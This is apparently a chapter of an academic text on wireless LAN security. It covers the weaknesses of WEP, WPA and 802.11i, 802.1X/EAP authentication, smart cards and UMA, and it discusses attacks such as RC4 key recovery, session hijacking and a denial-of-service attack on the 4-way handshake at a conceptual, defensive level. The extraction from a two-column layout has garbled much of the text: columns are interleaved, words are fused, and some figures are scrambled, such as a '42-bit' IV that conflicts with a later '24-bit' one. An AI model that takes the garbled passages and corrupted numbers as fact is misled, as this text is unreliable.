The great promise of wireless LAN will never be realized unless there is an appropriate security level.
From this point of view, various security protocols have been proposed to handle wireless local-area
network (WLAN) security problems that are mostly due to the lack of physical protection in WLAN or
because of the transmission on the radio link. The purpose of this chapter is (1) to provide the reader
with a sample background in WLAN technologies and standards, (2) to give the reader a solid ground-
ing in common security concepts and technologies, and (3) to identify the threats and vulnerabilities of
WLAN communications.
wlAn stAndArds And stations. Basically, WLAN networks can be seen

tEcHnologIEs, bEnEfIts And as extensions of wired Ethernet networks. WLAN
usE cAsEs leverages on a set of newest digital communica-
tions technologies to make it possible to establish
IEEE 802.11/wireless local-area network (WLAN) a local area network for computer communications
technologies (WLAN, 2003) have evolved phe- without the use of cables.
nomenally over the last few years. They have been IEEEapprovedthefirststandard 1 .2 0 8 in. 79 1
widely deployed in a variety of network environ- This version is limited to only 1 and 2 Mbps data
ments and they properly converge with actual rates. Subsequently in 1999, 802.11a and 802.11b
Internet and 3G infrastructures. were approved, expanding to new radio bands
IEEErefers
1 2. 0 8 toasetofspecificationsfor (changing the usage of the 2.4 GHz ISM band and
WLAN developed by IEEE. It specifies an over- adding usage of the 5 GHz UNII band) and increas-
the-air interface between a mobile station (STA) ing the available data rates to 54 Mbps and 11 Mbps,
and a base station as well as between two mobile respectively. Consequently, large deployments of
Security in WLAN
802.11 WLAN started being rolled out, especially than the wired LAN. The open access to the net-
in enterprises to replace or extend the wired lo- works permits malicious action at a distance and
cal-area network (LAN) with an implementation simplify passive interception. The temptation for
of WLAN, and in airports and various business unauthorized access and eavesdropping is also
venues where they installed several WLAN access a reality (Khan & Khwaja, 2003) because an at-
points offering a public Internet access (so-called tacker could easily access the transport medium.
hotspots), which can range from a small covered This is not easy in wired LAN due to the physical
zone to many square miles of overlapping hotspots access to the media. WLANs have introduced a
in metropolitan areas. new security threat, sometime referred to as park-
While the most obvious advantage of the WLAN ing lot attack (Arbaugh, 2003) (i.e., a person with
ismobility,therearealsootherbenefits: a wireless computer and a makeshift antenna can
gain access to your the WLAN from hundreds
• Installing and maintaining flexibility: of feet away). Other security issues are mostly
Installation of a WLAN system is fast and because of the lack of physical protection of the
easy and eliminates the terminal cabling wireless network access or of the transmission on
costs. It extends to area where wires cannot the radio that cannot be confined to the walls o
be installed. an organization.
• Apparent ease of use: WLAN is easy for The original1 standard2. 0 8 defines authen
-
novice and expert users alike, eliminating the tication and encryption mechanisms based on
need of a large knowledge to take advantage the use of the wired equivalent privacy (WEP)
of WLAN. protocol. Unfortunately, this protocol suffers from
• Transparency: WLAN is transparent to a serious design aws fl (Miller & Hamilton,.) 02
user network, allowing applications to work Furthermore, it does not define a -key manage
in the same way as they do in wired LANs. ment mechanism; it presumes that the secret key
• Scalability: WLANs are designed to be is conveyed between WLAN entities through a
simple or complex; they range from networks secure channel independent of 802.11 WLAN. As
suitable for a small number of nodes to full aresultofdifferentaws fl discoveredinWEP,the
infrastructure networks of thousands of nodes security of WLAN has been widely studied, and a
and large physical area by adding access set of standards have been developed by IEEE and
points to extend coverage and to provide users IETF, especially 802.1X (802.1X, 2004), 802.11i
with roaming between different areas. (802.11i, 2004) and extensible authentication pro-
tocol (EAP) (Aboba, Blunk, Vollbrecht, Carlson, &
WLAN was developed to extend wired LAN Levkowetz, 2004). The 802.1X standard has been
wirelessly and therefore to minimize Ethernet ca- standardized by 802.1 working group. 802.1X was
bling. It was designed to provide “data obscurity” initially conceived to securely manage the access
equivalent to that provided by wired Ethernet with to different IEEE 802.1 networks. It is a framework
easier installation. However, there is some dif- for authenticating and controlling user traffi
ference between WLAN and wired LAN due to the network level, as well as dynamically varying
constraintsintroducedbythefirst,and especially the
exchanging encryption keys between a mobile
shared medium, interference, the collisions that station and an authentication server. By pushing
cannot be detected reliably, the physical bound- the authentication method to the virtual layer,
ary that is difficult to control, and to the the signal.
X1 2.08 definesanopensecurityarchitecture,
These differences make the WLAN security which principally allows user authentication and,
harder to maintain in comparison to wired LAN. optionally, session key generation and derivation
In WLAN, it is possible for an attacker to snoop on a per-user and per-session basis. Because of
onconfidentialitycommunicationsormodify them for dynamic provisioning, 802.1X
this possibility
to gain access to the network much more easily is used as the common base in the current WLAN

Security in WLAN
security suites such as Wi-Fi protected access a terminal attached to the network. WLAN uses
(WPA) (WPA, 2003) and IEEE 802.11i (802.11i, a concept called port-based access control that is
2004). based on the notion of a port. The port-based ac-
The rest of the chapter presents a more detailed cess control blocks all traffic on a (logical) port
description of the various WLAN standards from until some condition is true. The condition for the
the security perspective: challenges and possible port opening is a successful user association and
attacks in WLAN security; WLAN infrastructure authentication.
security; authentication, authorization, and ac- An association precedes each communication
cesscontrol;confidentialityandprivacy; betweenand key
the STA and the AP. The association is
management and establishment. formed between a STA and an AP by exchanging
messages, by the means of so-called management
frames, allowing both STA and AP to create and
wlAn MAnAgEMEnt frAMEs tomaintaintheassociationstates.WLANdefines
three states: unauthenticated and unassociated,
A WLAN network is formed by entities called authenticated and unassociated, and authenticated
stations (STA). A WLAN can operate in two and associated.
modes: infrastructure and ad hoc. In the ad hoc The management frames can be started by the
mode, each STA communicates directly with STA sending a probe request management frame
other stations. In the infrastructure mode, stations to find anAPaffiliatedwithaselectedESSID,or
communicate with each other via a special STA, scanning the beacon management frame broadcast
called access point (AP). Each AP additionally by the APs at a fixed interval. As part - of the as
has a connection to the distributing system (DS), sociation processes, the STA and the access point
which can take different forms (wireless, wired, perform an authentication. IEEE 802.11 originally
OSI layer, etc.). In this chapter, we focus on the definestwoauthentication openmodes,
systemthe
infrastructure mode. authentication (OSA), practically equivalent to
The infrastructure mode extends the range of no authentication, and shared key authentication
the wired LAN. It introduces a notion of basic (SKA), a simple challenge handshake protocol
service set (BSS). Each BSS is formed by an AP based on a preshared key between the STA and the
and associated stations, and can be roughly un- APandthespecifiedWEPprotocol.Furthermore,
derstood as a WLAN equivalent of a cell (a base other methods can be used to restrict the access
stationandmobilenodes)It . isuniquely to anAP,suchasclassicalMACaddressfiltering
identified
by the medium access control (MAC) address of (whitelisting or blacklisting STA MAC addresses)
the STA of its AP, called BSSID. By using their and the suppression of service advertisement, usu-
DS connection, several APs can allow a station ally called SSID hiding.
to move from one BSS to another. Several BSSs It must be noted that neither of these methods
may be collected, constructing an extended ser- can be considered sufficiently secure given the
viceset(ESS)The . identifieroftheESSisacase current usage of the 802.11 technology. Since
sensitive string of 32 bytes (ESSID), and can be MAC addresses need to be transported in clear and
roughly understood as a “network name.” In the canbeeasilychanged,theMACaddressfiltering
infrastructure mode, it is usually called SSID for is not enough of a barrier. SSID hiding only can
convenience. work as long as nobody uses the service, since the
One of the primary services of WLAN manage- associating STA will try to solicit an AP under a
ment frames is to provide access control reliability. given SSID, thus effectively disclosing this “secret.”
This is done originally based on a predetermined The included SKA scheme lacks mutuality and is
set of MAC address and improved later with way too static (no session key derivation, no key
802.1X. The access control usually implements a management) to be applicable in an operational
way to provide authentication or authorization to industrial environment. Accidentally SKA was

Security in WLAN
found to be misconceived, effectively rendering WEP Confidentiality and Data

it useless. The details of these findings will be
Integrity
discussed in the next sections.
WEP uses a 40-bit key that is concatenated to a
42-bit IV to form the traffic key. The resulting
wlAn sEcurIty EssEntIAls key is used as an input to the RC4 pseudo-random
number generator (PRNG) to generate a pseudo-
The1 standard
2. 0 8 defines an optional encryp - random key sequence.
tion scheme to protected data streams exchanged When a device encrypts data using WEP, it
over-the-air between the STA and the AP. This calculates the integrity check value (ICV) over the
scheme, called WEP, was designed to prevent data to be sent (ICV is implemented as a CRC-32-
unauthorizedaccesstothewireless LANThe
bits). traffic.
device concatenates the data and the ICV
It uses the stream cipher RC4 for confidentiality before the result is XORed with the key sequence
equivalent to a traditional wired network, and a (in a typical stream cipher manner).
CRC-32 checksum for integrity protection. Shared Upon reception, the AP retrieves the IV from
key authentication type requires WEP support. the arrived packet to generate the same pseudo-
The1 standard
2. 0 8 does not define how to random key sequence. Then, the AP XORs the key
distribute shared keys to the equipment in the sequence to the received frames and computes the
network. In other words, WEP key management ICV of the decrypted text, comparing it to the ICV
and distribution is outside the scope of 802.11. of the received packet. If the two ICV do not match,
the AP sends an error indication to the sender.
wEP-based Authentication Note that due to interference, out-of-order or
lost-packet rates are plausible within 802.11 com-
ThefirstfeatureofWEPistoprevent - unauthen
munication channels. Therefore and in order to
ticated users from gaining access to the WLAN ensure the so-called self-synchronisation property,
network. STA attempting to gain access to the WEP uses a per-packet RC4 key and generates
network must send an authentication frame con- a separate keystream per packet. For that, WEP
taining, among others, its asserted identity to the concatenates a per-packet IV to the WEP key.
AP, which replies with another authentication
frame transporting a challenge text. The device
encrypts the challenge text using WEP with the IssuEs In wlAn sEcurIty
shared key and its own initialization vector (IV),
concatenates the encrypted output to the IV, and Due to the shared nature of the wireless medium, it
sends the result to the AP: is easy to create associations with unprotected wire-
less networks. Consequently, unauthorized STAs
STAAP: Authentication Request (STA asserted are able to launch attacks on a wireless network,
identity) for example, to affect the WLAN performance
APSTA: Challenge or to get an Internet access, as well as on another
STAAP: WEP(Challenge,IV,Key)=Challenge STA to eavesdrop on its established association.
XORRC4(IV|Key) Attacksareclassifiedasactiveandpassive.
APSTA: Success <or> Reject. A passive attack is an attack where an unau-
thorized attacker monitors or listens on the com-
Using the same key, the AP decrypts the re- munication between two or more parties. Active
sponseandverifiesthatthedecrypted textmatches
attacks havethepossibilityofinflictingundetec
the challenge text it sent to the device, before ac- corruption on the data in transit by manipulating
cepting or denying device access to the network. the cipher text in special ways that do not change
its built-in cyclic redundancy checks.

Security in WLAN
WLAN devices broadcast their MAC addresses directly exposing the long term secret), and to the
over-the-air and it is therefore easy to observe the absent message integrity checking (the available
MAC address for an associated mobile station and CRC32 integrity does not depend upon the keys
spoof it to masquerade as a legitimate device. and mainly targets transmission problems; it is
DuetothenatureofWLAN,intruderscan ood
fl
therefore possible to alter a packet whose content
the open medium access and are able to execute was known even if it had not been decrypted).
denial-of-service attacks (DoS) to bring down More information on WEP attacks may be found
WLAN access or services. An attacker may launch by Borisov, Goldberg, and Wagner (2001).
denial-of-service attacks by spoofing, replaying, In a WLAN context, a passive attack takes
or generating management frame packets. advantage of several weaknesses in the key-
Another problem related to the open medium scheduling algorithm of RC4. It could be done
is jamming WLAN frequencies. Jamming against also by a comparison of the encrypted version of
WLAN is almost impossible to prevent and can be a known messagee. ( g., TCP fields) to repetitive
executed easily as noise or interference on chan- IV-based encryption combinations of the known
nels that deliver WLAN services. For example, in text and to reveal the secret key (Morrison, 2002).
a military environment, jammers are often located In fact, the 24-bit IV implies that 224 packets can
in helicopters as the line-of-sight propagation gives be protected with the same key, before changing
them an advantage over communication transmit- the key. Because the IV is relatively short, and is
ters located on the ground (Stahlberg, 2000). transmitted in the clear text, it will be repeated with
WLANs are also vulnerable to session hijack- sufficientfrequencythattherestofciphercanbe
ing attacks due to the lack of authentication of the relatively easily cracked. On the other hand, WEP
management frames as well as to the WLAN state byitsdesigncannotefficientlyreduceoverheadof
machines. Session hijacking is a combination of denial-of-service attacks. In particular, it does not
DoS and identity spoofing attacks andprotect it can be packets, or the part of the packet
beacon
launched by 1) eavesdropping on the medium to header, which includes the MAC address unen-
discover the MAC address of a legitimate station crypted. Consequently, it is not hard to infiltra
and/or of the AP, 2) deauthenticating the legitimate the WLAN using WEP.
station to terminate its connection to the AP (spoof- Consequently, a dedicated task group called
ingSTAorspoofingAPaddresses)and , using
)3 the
802.11i has been set up by IEEE to create a replace-
eavesdropped MAC to reauthenticate to a different ment security solution. The released IEEE 802.11i
or to the same AP on the same WLAN. amendment introduces an improved security
mechanism called Wi-Fi protected access (WPA)
wEP weaknesses to solve WEP-related authentication - and confi
dentiality problems and to introduce an efficien
Shared key authentication was designed to help frame integrity scheme. 802.11i security solution
in reducing attacker activities against WLAN. (called robust secure network or WPA2) uses a
Unfortunately, WEP has turned out to be much new counter-mode/CBC-MAC protocol (CCMP)
less secure than intended. Fluhrer, Mantin, and cipher based on the advanced encryption standard
Shamir’s (2001) paper entitled “Weaknesses in the (AES) instead of RC4.
Key Scheduling Algorithm of RC4” describes how
an attacker can intercept transmissions and gain
unauthorized access to wireless networks. Other 802.1x, wPA, And IEEE 802.11I
problemsarerelatedtotheinsufficient (wPA2) IVlength
(thus permitting to decrypt frames without key
knowledge), absent key management (on the one IEEE 802.11i is a dedicated task group to specify
hand resulting in manual settings and typically and to create a replacement security solution. It
weaker alphanumeric keys, and on the other hand provides enhanced security services and mecha-

Security in WLAN
nisms for the IEEE 802.11 medium access control that every data packet is sent with its own unique
beyond the features and capabilities provided by encryption key. Moreover, it includes a key hash
WEP. These security services are established by de- function to improve resistance against Fluhrer
finingtemporal key integrity protocol (TKIP) and attacks (Fluhrer et al., 2001) and MIC and it uses
counter-mode/CBC-MAC protocol (CCMP) that 802.1X for key management and establishment.
provide more robust data protection mechanisms The MIC prevents forged packets from being
than what WEP affords. 802.11i also introduces accepted. Thanks to per-packet key mixing, it is
the concept of a security association and
very defines
hard for an eavesdropper to correlate the IV
security association management protocols called and the per-packet key used to encrypt the packet
the 4-way handshake and the group key handshake. (Chandra, 2005). More precisely, TKIP hashes
Also,itspecifieshowIEEEX1 2.08 maybeutilized the combination of the IV value, the data encryp-
by IEEE 802.11 LANs to effect authentication. tion key (derived from the master secret), and the
The IEEE 802.11i architecture usually contains MAC address. This mechanism addresses the
or implements the following components: WEP problem when concatenating the key with
the IV to form the traffic key, and then reducing
• 802.1X for authentication, entailing the use of the ability of the related key attack.
IETF’s EAP and an authentication server.
• Robust security network (RSN) for keeping key Hierarchy
track of associations.
• AES-basedCCMPtoprovideconfidentiality, The master secret used in key hierarchy can be a
integrity, and origin authentication. Another preinstalled key or a per-session key. In fact, TKIP
important element of the authentication pro- can be used with an IEEE 802.1X authentication
cess is the four-way handshake, explained server, which shares a master key with each user
below. as a consequence of a successful authentication
process as well as in a preshared key (PSK) mode
wPA where all authorized users share a PSK. These two
modes target two distinct environments respec-
Because WEP has been shown to be totally inse- tively, enterprise and home networking.
cure and in order to strengthen the weak keys used As we cited before, TKIP extends the WEP
by WEP, 802.11 Working Group has proposed a key hierarchy to reduce the exposure of the (long
new WPA protocol called TKIP. This protocol term) master secret and to provide per-packet key
is designed to strengthen the security of 802.1X mixing, a message integrity check as long as a
networks and to leverage the existing WEP-en- rekeying mechanism. This extension is shown in
abled WLAN network interface card (NIC), while thefollowingfigure.Atagivenlayer,thedifferent
remaining backward compatible with existing keys are generated by applying the pseudo random
hardware (no change in the hardware engine). function (PRF) on, among others parameters, the
This is done by distributing firmware/key software
of the upper layer and the MAC addresses of
upgrades including new algorithms to be added to the two endpoints.
WEP, such as message integrity code (MIC) and
per-packet key mixing function. Preshared key
TKIP uses a key scheme based on RC4, but
unlike WEP that uses the master key for authen- As we cited before, 802.11i security solution uses
tication and per-packet encryption, TKIP extends 802.1X (see next section) that requires a logical
this key hierarchy to reduce the exposure of the authentication server entity. However, 802.11i de-
master secret and to provide per-packet key mix- finesthepresharedkeysolutionasanalternat
ing, a message integrity check as long as a rekey- to 802.1X-based master key establishment. This
ing mechanism. Consequently, TKIP ensures solution can be used for home or small networks
00
Security in WLAN
Figure 1. WPA Key hierarchy
802.1X GMK initialized by the AP

EAP Method
(enterprise authentication
network) GTK
Pairwise Master Groug Encryption Key Groug Integrity Key

Preshared Key Secret
(home network) GEK GIK
Pairwise Transient Key
EAPOL-Key EAPOL-Key Temporal Temporal AP Temporal AP

Confirmation Key Encryption Key Encryption Key Tx MIC Key Rx MIC Key
KCK KEK TEK TMK1 TMK2
Per-Packet Encryption Key
and does not require installation of an authenticator. It dialogue with the authentication server
tion server. through the authenticator.
The PSK is 64 hexadecimal digits or a pass • The Authenticator: Typically a wireless
phrase 8 to 63 bytes long, in which each STA has access point that controls the state of each
its own PSK tied to its MAC address and uses it port (open/close) and mediates an authentica-
to get access to the network. The key hierarchy tion session between the supplicant and the
is showed in Figure 1. The PSK is however used authentication server.
directly to compute the pair-wise transient key • The Authentication Server: Typically a
(PTK). The rest of the key computation process (remote authentication dial in user service)
remains unchangeable. RADIUS server that performs the authentica-
The PSK is a 256-bit random value or a pass tion process on behalf of the authenticator.
phrase 8 to 63 bytes long, in which each STA has The resulting decision consists of whether
a PSK tied to its MAC address and uses it to get the supplicant is authorized to access the
access to the network. The key hierarchy is showed authenticator’s network. Note that 802.1X
in Figure 1. The PSK is however used directly to does not require use of a central authentication
compute the PTK. The rest of the key computation server, and thus can be deployed with stand-
process remains unchanged. alone bridges or access points, as well as in
centrally managed scenario (802.1, 2004).
IEEE 802.1x
The most important component in 802.11i ar-
IEEE 802.1X is introduced for port-based network chitecture is the IEEE 802.1X port access entity
access control. It provides authentication to stations (PAE), which controls the forwarding of data to
attached to a LAN port, establishing a point-to- and from the MAC. A STA always implements a
point connection in case of success or preventing Supplicant PAE and implements EAP peer role,
access from that port if authentication fails. and an AP, acting as an Authenticator, always
802.1X uses three terms: implements an Authenticator PAE and implements
the EAP Authenticator role.
• The Supplicant: A station that requests ac- 802.1X is based on EAP, which is a powerful
cess to the network offered by the authentica- umbrella that shelters multiple authentication
0
Security in WLAN
Figure 2. 802.1X messages exchange between a supplicant, an authenticator, and the authentication
server
methods. When IEEE 802.1X authentication is used (PMK) by two parties and to distribute a group
within 802.11 networks, EAP is used transparently temporal key (GTK). Several keys are established
between the station and the (usually remote) authen- as a result of a successful authentication. The keys
tication server and relayed through the AP. 802.1X are derived from the PMK (in particular, the pair-
requires the cooperation between the authentication wise transient key).
server and an EAP method. In the case of a wire- i
1 2.08 defines two key hierarchies: a) ( pair-
less LAN, the EAP method is required to perform wise key hierarchy to protect unicast traffic and
mutual authentication and key management and (b) GTK, a hierarchy consisting of a single key to
distribution\REF-RFC-REQ-EAP-WLAN.Using protect multicast and broadcast - traffic. Furth
theexibility
fl proposedbytheIEEEX1 2.08 archi- more,itdefinesTKIPuses ( existinghardware)and
tecture, multiple EAP-based security protocols CCMP (needs additional hardware) to repair the
and mechanisms such as EAP-SIM (Haverinen & problems caused by WAP. TKIP provides stronger
Salowey, 2006), EAP-TLS (transport layer secu- security through a keyed cryptographic message
rity) (Aboba & Simon, 1999), and protected-EAP integrity code (MIC), an extended IV space, and
(Palekar, Simon, Zorn, Salowey, Zhou, & Josefsson, a key mixing function. And the CCMP is used to
2004) are proposed. These EAP methods are used providedataconfidentiality,integrity,andrepl
with the 802.11i (or WAP2) and WPA standards protection.
in order to establish authenticated access and key
calculation and distribution. -Way Handshake
IEEE 0.i (WPA) Once the authenticator and the mobile station have
agreed upon a shared PMK, they can begin a 4-way
Theproceduresdefinedini 1 2.08 adoptthekey-
handshake: STA represents the station; STAA and
hierarchydefinedbyWPAandprovidefresh keys
AA, SNonce and ANonce, represent the MAC ad-
by means of protocols called the 4-way handshake dress and the nonce of the station and authenticator,
and group key handshake. 4-way handshake is a respectively; SN is the sequence number; msg1,
pair-wisekeymanagementprotocolusedto confirm
msg2, msg3, and msg4 are indicators of different
the mutual possession of a pair-wise master key message types; and MICEAPOL-KCK() represents the
0
Security in WLAN
Figure 3. 802.11i 4-way handshake
Authenticatior Mobile Station

msg1: AA, ANonce, SN,
msg2: SPA, SNonce, SN, msg2, MICPTK(SNonce, SN, msg2)
msg3: AA, ANonce, SN, msg1, GTK transmission
msg4: SPA, SNonce, SN, msg2, MICEAPOL-KCK(SNonce, SN,
message integrity code calculated for the contents Authentication Server

inside the bracket with the fresh PTK.
Typically, 802.1X performs authentication and
EAP key management through a server, such as AAA
RADIUS (authentication, authorization and ac-
EAP is the IETF standard for extensible authen- counting, remote authentication dial in user service)
tication for network access. It was designed to or DIAMETER. RADIUS (Aboba, 2006; Rigney,
enable an extensible OSI layer 2 authentication Willens, Rubens, & Simpson, 2000) is a widely
before the IP configuration could be acquired. deployed AAA protocol. As we cited, the EAP
Originally developed for use with point-to-point packets are carried by EAPOL directly over the
protocol (PPP) (Simpson, 1994), it has subsequently wireless interface between the STA and the access
also been applied to IEEE 802 wired networks point, and by EAP over RADIUS between the
(802.1, 2004) and wireless networks such as 802.11 access point and the authentication server. This
(WPA, 2003). effectively creates an EAP conversation channel
EAP can be viewed as a transport framework between the station and the authentication server,
and supports multiple authentications mechanisms which allows the supplicant to authenticate. The
such as EAP-TLS, EAP-SIM and EAP-AKA, authentication is realized by the chosen authentica-
without having to prenegotiate a particular one. tion mechanism. This phase will also generate a
Authenticators do not need to understand each secret key that will be used in the key hierarchy.
request type and may be able to simply act as a The generated key of EAP between the STA and
pass-through agent for a “back-end” server on a the AAA server is therefore conveyed to the AP
host. The authenticator starts the EAP exchanges using the AAA protocol.
with a port closed state; it needs however to look
for the success/failure sent by the authentication EAP-TLS
server to open/close the port.
EAP packets include all relevant information EAP-TLSdefinesthetransportoftransportlayer
about the required authentication scheme, for security (Dierks & Allen, 1999) in EAP. TLS is one
example, authentication method and packet code of the most deployed security protocols, which is
(request, response, success, or failure), and allow mainly due to its integration in navigators. TLS is an
for method negotiation (a special NAK type). The IETF-standardized authentication method derived
exact content of these packets is up to the chosen from the secure sockets layer (SSL) protocol.
EAP authentication mechanism. The progression TLS authentication within EAP is quite straight-
of an authentication procedure also depends on forward. The TLS handshake packets are encapsu-
the chosen authentication mechanism. lated in an appropriate EAP form and transported
0
Security in WLAN
between the station and the authentication server. security Problems

Because of the size of the certificates exceeding
typicallinkMTUs,EAP-TLSadditionallydefines 802.1X is intended to provide strong authentica-
fragmentation. When the TLS authentication tion, as well as key management and distribution.
dialog succeeds, the authenticator (host requiring However, 802.1X suffers from some security
the authentication on behalf of a supplicant) gets problems related to its use in conjunction with
the authorization information delivered within the WLAN 802.11. This conjunction suffers from the
RADIUS access-accept message and access to the absence of an ensured synchronization of the vari-
network is granted. ous state machines, causing potential attacks such
EAP-TLS defines the full Handshake phase as man in the middle, session hijacking, and DoS.
that involves the exchange of X.095 certificates Furthermore, others attacks are possible because
and the cryptographic information to allow peers EAP does not include any integrity information to
to be authenticated. This step requires several its transported packets. For example, at the end of
operations. First, peers must verify the integrity the authentication process, the authenticator will
ofcertificatesandshouldgenerally - support
sendan certifi
EAPnotificationmessagetoindicatethe
cate revocation messages (the peer may not have success or the failure of that process. Since this
Internet connexion and therefore it can use online notificationdoesnotincludeanyintegrity - prot
certificate status protocol OCSP) ( totion
obtain
data, anthe
attacker can easily replace an EAP
revocationstatusofacertificate[Blake- Wilson
failure with EAP etsuccess and deny the access to
al.])
302 , Also,
. thecertificatemustbeverified the to
WLAN network.
ensureitissignedbyatrustedcertificate - author
On the other hand, He and Mitchell (2004) dem-
ity (CA). Finally, the client (i.e., station) should be onstrate a DoS attack against a 4-way handshake of
abletoviewtheinformationaboutthe certificate
802.11i. The attack can be realixed by impersonat-
and the CA root. ing the authenticator, composing a Message 1, and
EAP-TLS indicates that a secure connection sending to the STA. The attacker sends a forged
may be terminated and resumed later. This (ab- Message 1 to the STA after Message 2 of the 4-way
breviated handshake) phase may be established if handshake. The STA will calculate a new PTK
the client and the server agree. During this phase, corresponding to the nonces for the newly received
the client and the server will use the master key, Message 1, causing the subsequent handshakes to
which is calculated during the last full handshake be blocked because this PTK is different from the
phase, to mutually authenticate and to calculate and one in the authenticator. The attacker can deter-
generate new keys for the secure channel. After mine the appropriate time to send out Message 1
that, they verify the integrity of their exchanged bymonitoringthenetworktrafficorjustooding fl
handshake messages and then begin to exchange Message 1 with some modest frequency.
data over the secure connection. Some available tools can be used to crack
The abbreviated handshake allows the client and WAP in PSK mode, especially coWPAtty, which
the server to avoid several expensive cryptographic is a brute-force cracking tool, which means that
operations such as private key computations, client/ it systematically attempts to crack the WPA-PSK
servercertificatedecodingandverification, onlinepasswords, in order, one at a
by testing numerous
consultation of certificate revocation list CRL)
( , 2005).
time (Fogie,
and generation and encryption/decryption of the
premaster secret key, which is used for generating Additional security needs: Privacy
the master secret key. Moreover, the abbreviated and Identity Protection
TLS handshake shortens the authentication delay
and preserves the precious radio bandwidth. During the authentication and security association
phases, almost all security protocols, including
802.1X and EAP methods, exchange identity
0
Security in WLAN
related data in clear text and without any encryp- A smart card is a portable and tamper-resistant
tion. Therefore, security parameters owing
fl
computer. in
It provides data security, data integ-
the network could potentially be logged, archived, rity, and personal privacy and supports mobility.
and searched. Furthermore, major application areas including
Basically, certificates are issuedmobile by a trusted
communication use smart card to convey
third party linking the identity of the user certificate
subscription and identification informat
owner to the public key, whereas the shared secret as well as to provide user identity and to build
is managed through its identifier. Certificate or
computer and network access.
shared key identifiers are usually sent in802.1X/EAP
In the clear context, (Urien & Pujolle,
text and consequently, entities cannot protect 2005) describes the interface of the EAP protocol
their identities from eavesdropping. Thus, an in smart cards, which can store multiple identi-
intruder can learn who is reaching the network, ties associated to EAP methods and appropriate
when, and from where, and hence, track users by credentials. It presents implementations of the
correlating client identity to connection location. EAP-TLS smart cards, which securely stores TLS
Especially in WLAN, where the access medium security parameters, such as client - X509 certifi
is open to eavesdroppers, and the mobility is a cate, client private RSA key, and CA public key.
reasonable service, the location tracking can be a For more information regarding the EAP smart
serious security issue. The PEAP and EAP-TTLS card configuration and test steps, please refer t
authentication methods can be used to protect the OpenEAPSmartCard (2006), which is an open
user identity. Both are two-phase protocols with Java card platform for authentication in Wi-Fi and
the first phase used to establish a TLS WLAN withnetworks.
only
server authentication and the second phase used
to deliver, among others, the user identity.
Privacy and identity protection are increas- tHE unIvErsAl AccEss MEtHod
ingly required for 802.1X/EAP and consequently,
research is being carried out to add credentials and A different approach to authentication and authori-
identity protection to EAP methods, especially to zation for WLAN is that based on Web-based un-
EAP-TLS.Inthislattermethod,theclientcertificate licensed mobile access (UAM), the most prevalent
is sent in clear text and therefore, an attacker can formofaccesstoWLAN.Thisapproachdefines
easily sniff packets conveying the client creden- a sign-on usage model using the user navigator
tials. To avoid sending identity information in clear or Web browser and it is adopted by a number of
text during the TLS session, Hajjeh and Badra (in WLAN hotspots providers. The Web-based UAM
press) extend TLS with an enhanced, completely approach is very simple. When the user attends to
backwards compatible mechanism. The client get Internet access through a given hotspot, this
identity protection is provided by symmetrically latter will redirect the user’s browser to a local
encryptingtheclientcertificatewith Web akey derived
server. After redirection, the user will be
from the TLS master secret, invited to be authenticated by entering its creden-
tials (e.g., username, password). These credentials
Hardware security in wlAn are tunnelled through a secure session, typically
established using TLS.
Many agencies (GAO, 2001) require the use of
smart cards to overcome the vulnerabilities of
the storage of private and shared keys. In fact, unlIcEnsEd MobIlE AccEss
without smart cards, unauthorized access can be
easily established to an authorized device (e.g., UMA stands for Unlicensed Mobile Access; a tech-
station)toretrieveconfidentialand nologypersonal data
provides access to GSM and GPRS mobile
stored on it. services over unlicensed spectrum technologies,
0
Security in WLAN
including Bluetooth and WLAN. By deploying sEcurIty PErforMAncEs In

UMA technology, service providers can enable wlAn
subscribers to roam and handover between cellular
networks and public and private unlicensed wireless Security mechanisms usually involve using of
networks using dual-mode mobile handsets. With certificates, public-key infrastructures, - symmet
UMA, subscribers receive a consistent user experi- ric encryption/decryption, digest computation,
ence for their mobile voice and data services as they and so forth. Therefore, 802.1X/EAP will add a
transition between networks (UMA, 2005). performance impact, varying upon the deployed
The UMA architecture uses the following security protocol. Several studies have evaluated
standard IP-based protocols without any modi- the security performance of WLAN and the per-
fications. It uses IP/TCP to provide a tunnel formance forimpacts of WEP, WPA, EAP-TLS, and
GSM/GPRS signalling and SMS, IPSec ESP to other authentication protocols.
provide a secure tunnel for user and control plane Baghaei (2003) provides a study comparison
traffic, IKEv2 (Kaufman, ,)052 and EAP-SIM of the following eight security solutions used by
(Haverinen & Salowey, 2006), and EAP-AKA 802.11:
(Arkko & Haverinen, 2006) for authentication and
establishing and maintaining a security association 1. No security: no security mechanism activated
between MS and UNC. withdefaultconfiguration.
EAP-SIM and EAP-AKA introduce the smart 2. MAC address authentication carried out at
card use (e.g., SIM cards). Due to the smart cards the AP.
advantages cited before, a potential attacker will not 3. WEP authentication.
be able to access the smart card memory to spoof 4. WEP authentication with 40-bit WEP encryp-
or retrieve the private and personal data. Moreover, tion.
the attacker will not be able to have these data in 5. WEP authentication with 128-bit WEP en-
clear text outside the smart card since UMA is cryption.
operating over IPSec ESP, which provides a strong 6. EAP-TLS authentication.
authenticated and encrypted session. However, 7. EAP-TLS with 40-bit WEP encryption.
cares must be taken when implementing UMA 8. EAP-TLS with 128-bit WEP encryption.
technology on an open terminal. To have a focus
study on the impact of open terminal platforms This study comparison includes an analysis of
when UMA technology is implemented with GSM, the effect of different TCP and UDP packet sizes
please refer to Grech and Eronen’s (2005) work. on performance of secure networks. It shows
that WEP encryption significantly degrades the
Figure4.ThroughputofTCP,UDPtrafficinacongestednetwork
0
Security in WLAN
FigureComputing
5. timesdistributionforWLAN asmart security risks have increased expo-
card nentially as wireless services have become more
popular. The risks represent any malicious and
undesirable event on the various applications,
which possibly suffer from faults facilitating treat
concretization.Riskscanresultin - sniffingandhi
jacking of sensitive and personal data over the link
for unprotected Internet access. The consequences
are therefore variants (Hurley, 2002). It can eat
up bandwidth, but it could pose a darker issue as
virus writers can use the access to anonymously
performance of congested wireless networks. send viruses out.
Network performance degradation increased as the In answer, WLAN defined, among other,
number of clients was increased under all security the 802.1X standard, providing a framework for
mechanisms. authenticating and controlling user traffic t
On the other hand and in order to show the protected network, as well as dynamically vary-
impact of smart cards use within 802.1X/EAP, ing and exchanging encryption keys between the
we implemented EAP-TLS on smart cards, in wireless entity and the authenticator server. This is
which performance, benefits, and drawbacks done using
areEAP methods, which are also deployed
discussed and analysed by Urien, Badra, and jointly with the 802.11i and WPA standards. Imple-
Dandjinou (2004). menting WLAN technologies in a secure network
Figure 5 shows the repartition of computing requires on one hand a combination of these secu-
times during the authentication phase. The smart rity measures. On the other hand, organizations
card (10 MHz, 8 bits CPU, 2304 bytes RAM bytes, need to adopt security measures and practices that
